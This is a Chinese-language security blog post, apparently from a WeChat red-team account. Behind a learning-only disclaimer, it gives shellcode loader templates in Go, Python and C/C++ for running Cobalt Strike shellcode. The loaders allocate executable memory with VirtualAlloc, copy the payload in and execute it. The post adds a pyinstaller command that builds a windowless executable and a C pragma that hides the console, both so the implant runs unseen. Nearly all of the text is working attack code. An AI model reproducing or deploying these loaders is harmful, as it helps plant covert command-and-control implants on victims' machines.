关注本公众号，长期推送漏洞文章

知攻善防实验室

红蓝对抗，Web渗透测试，红队攻击，蓝队防守，内网渗透，漏洞分析，漏洞原理，开源 工具，社工钓鱼，网络安全。

74篇原创内容

**

公众号

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用！！！

/ Shellcode加载器 /

   

GoShellcode

   

使用cs生成shellcode

替换

去空格

def remove_whitespace_and_newlines(text):    text_without_spaces = text.replace(" ", "")
    text_without_newlines = text_without_spaces.replace(        "\n", "").replace("\r", "")
    return text_without_newlines



input_text = """ shellcode """
output_text = remove_whitespace_and_newlines(input_text)print(output_text)

Go语言

package mainimport (  "io/ioutil"  "os"  "syscall"  "unsafe")const (  MEM_COMMIT             = 0x1000  MEM_RESERVE            = 0x2000  PAGE_EXECUTE_READWRITE = 0x40)var (  kernel32       = syscall.MustLoadDLL("kernel32.dll")  ntdll          = syscall.MustLoadDLL("ntdll.dll")  VirtualAlloc   = kernel32.MustFindProc("VirtualAlloc")  RtlCopyMemory  = ntdll.MustFindProc("RtlCopyMemory")  shellcode_buf = []byte{     0xfc, 0x48,  ----shellcode----, 0xd5,  })func checkErr(err error) {  if err != nil {    if err.Error() != "The operation completed successfully." {      println(err.Error())      os.Exit(1)    }  }}func main() {  shellcode := shellcode_buf  if len(os.Args) > 1 {    shellcodeFileData, err := ioutil.ReadFile(os.Args[1])    checkErr(err)    shellcode = shellcodeFileData  }  addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)  if addr == 0 {    checkErr(err)  }  _, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))  checkErr(err)  syscall.Syscall(addr, 0, 0, 0, 0)}

测试上线

PythonShellcode

   

#!/usr/bin/pythonimport ctypesshellcode = bytearray("\xfc\xe8")ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),                                          ctypes.c_int(len(shellcode)),                                          ctypes.c_int(0x3000),                                          ctypes.c_int(0x40)) buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),                                     buf,                                     ctypes.c_int(len(shellcode)))ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),                                         ctypes.c_int(0),                                         ctypes.c_int(ptr),                                         ctypes.c_int(0),                                         ctypes.c_int(0),                                         ctypes.pointer(ctypes.c_int(0))) ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))

进行编译

python pyinstaller.py -F -w pyshellcode.py

**C/C++ **Shellcode

   

unsigned char buf[] = "shellcode";#pragma comment(linker,"/subsystem:"Windows" /entry:"mainCRTStartup"") //windows控制台程序不出黑窗口main(){  ( (void(*)(void))&buf)();}